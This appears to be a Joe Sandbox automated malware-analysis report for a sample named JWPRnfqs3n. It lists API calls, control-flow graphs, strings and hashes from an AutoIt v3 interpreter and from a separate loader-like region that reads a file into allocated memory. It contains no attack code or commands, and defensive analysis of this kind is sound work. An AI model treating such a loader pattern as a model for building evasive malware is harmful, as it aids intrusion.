                                                                              • Part of subcall function 00869734: _wcscmp.LIBCMT ref: 00869837
                                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00869452
                                                                            • _wcsncpy.LIBCMT ref: 008694C5
                                                                            • DeleteFileW.KERNEL32(?,?), ref: 008694FB
                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00869511
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00869522
                                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00869534
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                            • String ID:
                                                                            • API String ID: 1500180987-0
                                                                            • Opcode ID: 62fc2bda56608440994516e7c224d7270c83c89fbc6883783bd31fe30ff537b7
                                                                            • Instruction ID: af5f26c0921689228149e57d3835c5e33c89ff76a4ef47882f20c4e9bc60c898
                                                                            • Opcode Fuzzy Hash: 62fc2bda56608440994516e7c224d7270c83c89fbc6883783bd31fe30ff537b7
                                                                            • Instruction Fuzzy Hash: 7CC11EB1D00229AADF11DF99DC85ADEB7BDFF45310F0040A6F609E7291DB309A858F66

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00803074
                                                                            • RegisterClassExW.USER32(00000030), ref: 0080309E
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008030AF
                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 008030CC
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008030DC
                                                                            • LoadIconW.USER32(000000A9), ref: 008030F2
                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00803101
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                            • API String ID: 2914291525-1005189915
                                                                            • Opcode ID: 7d5d5bcb97a139039b6f76d2942de6fcece8851edba142a60736743bbedc0a50
                                                                            • Instruction ID: fdf5fa890a4c95e05c800702c6706a058c103efe3516c985ec4c5d178ce89bab
                                                                            • Opcode Fuzzy Hash: 7d5d5bcb97a139039b6f76d2942de6fcece8851edba142a60736743bbedc0a50
                                                                            • Instruction Fuzzy Hash: 843129B1850309EFDB51DFA8EC89A8DBBF0FB09320F20416AF691E62A1D7B51585CF51

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00803A50
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00803A5F
                                                                            • LoadIconW.USER32(00000063), ref: 00803A76
                                                                            • LoadIconW.USER32(000000A4), ref: 00803A88
                                                                            • LoadIconW.USER32(000000A2), ref: 00803A9A
                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00803AC0
                                                                            • RegisterClassExW.USER32(?), ref: 00803B16
                                                                              • Part of subcall function 00803041: GetSysColorBrush.USER32(0000000F), ref: 00803074
                                                                              • Part of subcall function 00803041: RegisterClassExW.USER32(00000030), ref: 0080309E
                                                                              • Part of subcall function 00803041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008030AF
                                                                              • Part of subcall function 00803041: InitCommonControlsEx.COMCTL32(?), ref: 008030CC
                                                                              • Part of subcall function 00803041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008030DC
                                                                              • Part of subcall function 00803041: LoadIconW.USER32(000000A9), ref: 008030F2
                                                                              • Part of subcall function 00803041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00803101
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                            • String ID: #$0$8o$AutoIt v3
                                                                            • API String ID: 423443420-4094678437
                                                                            • Opcode ID: 551e4427c51bfbb63d255da424e8cd4f39a992aacc2ded7b211ef15c7a856e1b
                                                                            • Instruction ID: 30c2dad571cf4e43a730b143ee52cfaa34911255dd7b9b15eb18b268b5452784
                                                                            • Opcode Fuzzy Hash: 551e4427c51bfbb63d255da424e8cd4f39a992aacc2ded7b211ef15c7a856e1b
                                                                            • Instruction Fuzzy Hash: 64214671D00708AFEF10DFA8EC09F9D7BF5FB08711F10012AE600AA2A2D3B566908F84

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00803074
                                                                            • RegisterClassExW.USER32(00000030), ref: 0080309E
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008030AF
                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 008030CC
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008030DC
                                                                            • LoadIconW.USER32(000000A9), ref: 008030F2
                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00803101
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                            • API String ID: 2914291525-1005189915
                                                                            • Opcode ID: 34d1ec6fd9313b05d5b3eaa3de96ab8e490d72b03dbb37e2de522bd52217b3ad
                                                                            • Instruction ID: b1d2def8e16319767fa1a79f3976139b5503459a83f1da2e2484dc63966db5f2
                                                                            • Opcode Fuzzy Hash: 34d1ec6fd9313b05d5b3eaa3de96ab8e490d72b03dbb37e2de522bd52217b3ad
                                                                            • Instruction Fuzzy Hash: 8E21C7B1911618AFEF00DFA8EC49B9EBBF4FB08710F10412AF611E62A1D7B15584CF91

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00804706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008C52F8,?,008037AE,?), ref: 00804724
                                                                              • Part of subcall function 0082050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00807165), ref: 0082052D
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008071A8
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0083E8C8
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0083E909
                                                                            • RegCloseKey.ADVAPI32(?), ref: 0083E947
                                                                            • _wcscat.LIBCMT ref: 0083E9A0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                            • API String ID: 2673923337-2727554177
                                                                            • Opcode ID: c59f1a19c885228caa97559f65e8ce6bafa9367b4bba74980e28087f666d5517
                                                                            • Instruction ID: a35a6896d32fa26a3efa252a941fb66170c50cb3e46c985e35790262c7c72aa5
                                                                            • Opcode Fuzzy Hash: c59f1a19c885228caa97559f65e8ce6bafa9367b4bba74980e28087f666d5517
                                                                            • Instruction Fuzzy Hash: D9714871508311AEC714EF69EC81DABBBB8FF94310F40492EF545C72A1EB71A958CB92

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 767 803633-803681 769 8036e1-8036e3 767->769 770 803683-803686 767->770 769->770 771 8036e5 769->771 772 8036e7 770->772 773 803688-80368f 770->773 774 8036ca-8036d2 DefWindowProcW 771->774 775 8036ed-8036f0 772->775 776 83d0cc-83d0fa call 811070 call 811093 772->776 777 803695-80369a 773->777 778 80374b-803753 PostQuitMessage 773->778 785 8036d8-8036de 774->785 779 8036f2-8036f3 775->779 780 803715-80373c SetTimer RegisterWindowMessageW 775->780 814 83d0ff-83d106 776->814 782 8036a0-8036a2 777->782 783 83d154-83d168 call 862527 777->783 784 803711-803713 778->784 786 8036f9-80370c KillTimer call 80443a call 803114 779->786 787 83d06f-83d072 779->787 780->784 789 80373e-803749 CreatePopupMenu 780->789 790 803755-80375f call 8044a0 782->790 791 8036a8-8036ad 782->791 783->784 808 83d16e 783->808 784->785 786->784 793 83d074-83d076 787->793 794 83d0a8-83d0c7 MoveWindow 787->794 789->784 809 803764 790->809 797 8036b3-8036b8 791->797 798 83d139-83d140 791->798 801 83d097-83d0a3 SetFocus 793->801 802 83d078-83d07b 793->802 794->784 806 83d124-83d134 call 862d36 797->806 807 8036be-8036c4 797->807 798->774 804 83d146-83d14f call 857c36 798->804 801->784 802->807 810 83d081-83d092 call 811070 802->810 804->774 806->784 807->774 807->814 808->774 809->784 810->784 814->774 818 83d10c-83d11f call 80443a call 80434a 814->818 818->774
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 008036D2
                                                                            • KillTimer.USER32(?,00000001), ref: 008036FC
                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0080371F
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0080372A
                                                                            • CreatePopupMenu.USER32 ref: 0080373E
                                                                            • PostQuitMessage.USER32(00000000), ref: 0080374D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                            • String ID: TaskbarCreated
                                                                            • API String ID: 129472671-2362178303
                                                                            • Opcode ID: 733a23d05960a63c10263c74f37fbfc0a42f334504d06802ba7f444aee0c76db
                                                                            • Instruction ID: fe3a5faf2a20ba4988e590dc7e2fa50805cad62103983cfbf500836ed913944e
                                                                            • Opcode Fuzzy Hash: 733a23d05960a63c10263c74f37fbfc0a42f334504d06802ba7f444aee0c76db
                                                                            • Instruction Fuzzy Hash: F44117B2100949ABDF546FACEC09F7A37ACFB55300F500135F702D62E2DB72A994A362

                                                                            Control-flow Graph

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                            • API String ID: 1825951767-3513169116
                                                                            • Opcode ID: 8cf27f47b46e07fcbb3c62bd01e6394b52236c2ebe2f7ab228317c3625ad6b69
                                                                            • Instruction ID: 4374bf16f3cdc2da117fc866962a2cddddf7980903495d5a36e3003e58e15ba1
                                                                            • Opcode Fuzzy Hash: 8cf27f47b46e07fcbb3c62bd01e6394b52236c2ebe2f7ab228317c3625ad6b69
                                                                            • Instruction Fuzzy Hash: D3A14C7290022D9ACF45EBA8DC91EEEB778FF15310F000529E516E71D2DF746A48CBA1

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 942 e55280-e5532e call e52c90 945 e55335-e5535b call e56190 CreateFileW 942->945 948 e55362-e55372 945->948 949 e5535d 945->949 957 e55374 948->957 958 e55379-e55393 VirtualAlloc 948->958 950 e554ad-e554b1 949->950 951 e554f3-e554f6 950->951 952 e554b3-e554b7 950->952 954 e554f9-e55500 951->954 955 e554c3-e554c7 952->955 956 e554b9-e554bc 952->956 959 e55555-e5556a 954->959 960 e55502-e5550d 954->960 961 e554d7-e554db 955->961 962 e554c9-e554d3 955->962 956->955 957->950 963 e55395 958->963 964 e5539a-e553b1 ReadFile 958->964 969 e5556c-e55577 VirtualFree 959->969 970 e5557a-e55582 959->970 967 e55511-e5551d 960->967 968 e5550f 960->968 971 e554dd-e554e7 961->971 972 e554eb 961->972 962->961 963->950 965 e553b3 964->965 966 e553b8-e553f8 VirtualAlloc 964->966 965->950 973 e553ff-e5541a call e563e0 966->973 974 e553fa 966->974 975 e55531-e5553d 967->975 976 e5551f-e5552f 967->976 968->959 969->970 971->972 972->951 982 e55425-e5542f 973->982 974->950 979 e5553f-e55548 975->979 980 e5554a-e55550 975->980 978 e55553 976->978 978->954 979->978 980->978 983 e55431-e55460 call e563e0 982->983 984 e55462-e55476 call e561f0 982->984 983->982 990 e55478 984->990 991 e5547a-e5547e 984->991 990->950 992 e55480-e55484 CloseHandle 991->992 993 e5548a-e5548e 991->993 992->993 994 e55490-e5549b VirtualFree 993->994 995 e5549e-e554a7 993->995 994->995 995->945 995->950
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E55351
                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E55577
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1333401749.0000000000E52000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E52000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_e52000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFileFreeVirtual
                                                                            • String ID: k[
                                                                            • API String ID: 204039940-1090507577
                                                                            • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                            • Instruction ID: a1738192ae393eb210645c08e1c9f08f5d756ed6134dbf12584c9ff1503ff2ce
                                                                            • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                            • Instruction Fuzzy Hash: 43A12A71E00208EBDB14CFA4C894BEEB7B5FF48306F209959E915BB280D7759A85CF54

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00820162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00820193
                                                                              • Part of subcall function 00820162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0082019B
                                                                              • Part of subcall function 00820162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008201A6
                                                                              • Part of subcall function 00820162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008201B1
                                                                              • Part of subcall function 00820162: MapVirtualKeyW.USER32(00000011,00000000), ref: 008201B9
                                                                              • Part of subcall function 00820162: MapVirtualKeyW.USER32(00000012,00000000), ref: 008201C1
                                                                              • Part of subcall function 008160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0080F930), ref: 00816154
                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0080F9CD
                                                                            • OleInitialize.OLE32(00000000), ref: 0080FA4A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 008445C8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                            • String ID: H$X$h
                                                                            • API String ID: 1986988660-3279992219
                                                                            • Opcode ID: 000c5b1f975911733709c4f97cd87043c86a83ecf0fa12aabb78c68c1e5d8095
                                                                            • Instruction ID: 72107a528fdccd4d6ae7c1363c95f94eaf3c7b68ff5069eb62fc3370455dabad
                                                                            • Opcode Fuzzy Hash: 000c5b1f975911733709c4f97cd87043c86a83ecf0fa12aabb78c68c1e5d8095
                                                                            • Instruction Fuzzy Hash: 8D81ACF0905A808ECF88DF79A845E197BF5FBA9306790812AD119CB372EB7464C58F19

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1114 8039d5-803a45 CreateWindowExW * 2 ShowWindow * 2
                                                                            APIs
                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00803A03
                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00803A24
                                                                            • ShowWindow.USER32(00000000,?,?), ref: 00803A38
                                                                            • ShowWindow.USER32(00000000,?,?), ref: 00803A41
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateShow
                                                                            • String ID: AutoIt v3$edit
                                                                            • API String ID: 1584632944-3779509399
                                                                            • Opcode ID: f99c9c30b9f30afe52cc3b6c698ca4b60e65617d92dd2eab2e9b5ad5957df94b
                                                                            • Instruction ID: 91addf3130cd1f95e526dae72384ee4ce267e45ec8f46b874a11a4b34a7193c8
                                                                            • Opcode Fuzzy Hash: f99c9c30b9f30afe52cc3b6c698ca4b60e65617d92dd2eab2e9b5ad5957df94b
                                                                            • Instruction Fuzzy Hash: 09F0DA715416907EEF316727AC49E6B3EBDF7C6F50F00412ABA04E2171C6752891DAB0

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1115 e55040-e5517c call e52c90 call e54f30 CreateFileW 1122 e55183-e55193 1115->1122 1123 e5517e 1115->1123 1126 e55195 1122->1126 1127 e5519a-e551b4 VirtualAlloc 1122->1127 1124 e55233-e55238 1123->1124 1126->1124 1128 e551b6 1127->1128 1129 e551b8-e551cf ReadFile 1127->1129 1128->1124 1130 e551d1 1129->1130 1131 e551d3-e5520d call e54f70 call e53f30 1129->1131 1130->1124 1136 e5520f-e55224 call e54fc0 1131->1136 1137 e55229-e55231 ExitProcess 1131->1137 1136->1137 1137->1124
                                                                            APIs
                                                                              • Part of subcall function 00E54F30: Sleep.KERNELBASE(000001F4), ref: 00E54F41
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E55172
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1333401749.0000000000E52000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E52000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_e52000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFileSleep
                                                                            • String ID: Q8X9EZ6H83VBXSMXT8
                                                                            • API String ID: 2694422964-3982865328
                                                                            • Opcode ID: 6d064ffc7f56baff640537454cfba4fd532f09707622775d4772aa25ae485cd5
                                                                            • Instruction ID: bf21af4c96283e2829b257cc72bb0ebce7ccb116ef5fa285850fb01d9ad25a72
                                                                            • Opcode Fuzzy Hash: 6d064ffc7f56baff640537454cfba4fd532f09707622775d4772aa25ae485cd5
                                                                            • Instruction Fuzzy Hash: 0251C531D04248EBEF11DBB4D854BEEBB79AF19305F104599E608BB2C1D7B90B48CBA5

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1139 80407c-804092 1140 804098-8040ad call 807a16 1139->1140 1141 80416f-804173 1139->1141 1144 8040b3-8040d3 call 807bcc 1140->1144 1145 83d3c8-83d3d7 LoadStringW 1140->1145 1148 83d3e2-83d3fa call 807b2e call 806fe3 1144->1148 1149 8040d9-8040dd 1144->1149 1145->1148 1159 8040ed-80416a call 822de0 call 80454e call 822dbc Shell_NotifyIconW call 805904 1148->1159 1161 83d400-83d41e call 807cab call 806fe3 call 807cab 1148->1161 1151 8040e3-8040e8 call 807b2e 1149->1151 1152 804174-80417d call 808047 1149->1152 1151->1159 1152->1159 1159->1141 1161->1159
                                                                            APIs
                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0083D3D7
                                                                              • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                                            • _memset.LIBCMT ref: 008040FC
                                                                            • _wcscpy.LIBCMT ref: 00804150
                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00804160
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                            • String ID: Line:
                                                                            • API String ID: 3942752672-1585850449
                                                                            • Opcode ID: f82fe5722177ea535cad8dd427d485e5ff0b5dab85d776db7b675b98b4d84a5a
                                                                            • Instruction ID: 2fb0ee4287a84917368a580d049da7f609c78091439c637db7b5a6af5b6f9900
                                                                            • Opcode Fuzzy Hash: f82fe5722177ea535cad8dd427d485e5ff0b5dab85d776db7b675b98b4d84a5a
                                                                            • Instruction Fuzzy Hash: CF31A0B2408705AAD7A1EB64EC45FDB77E8FF44314F10451AB685D21D1EB70A688C793
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
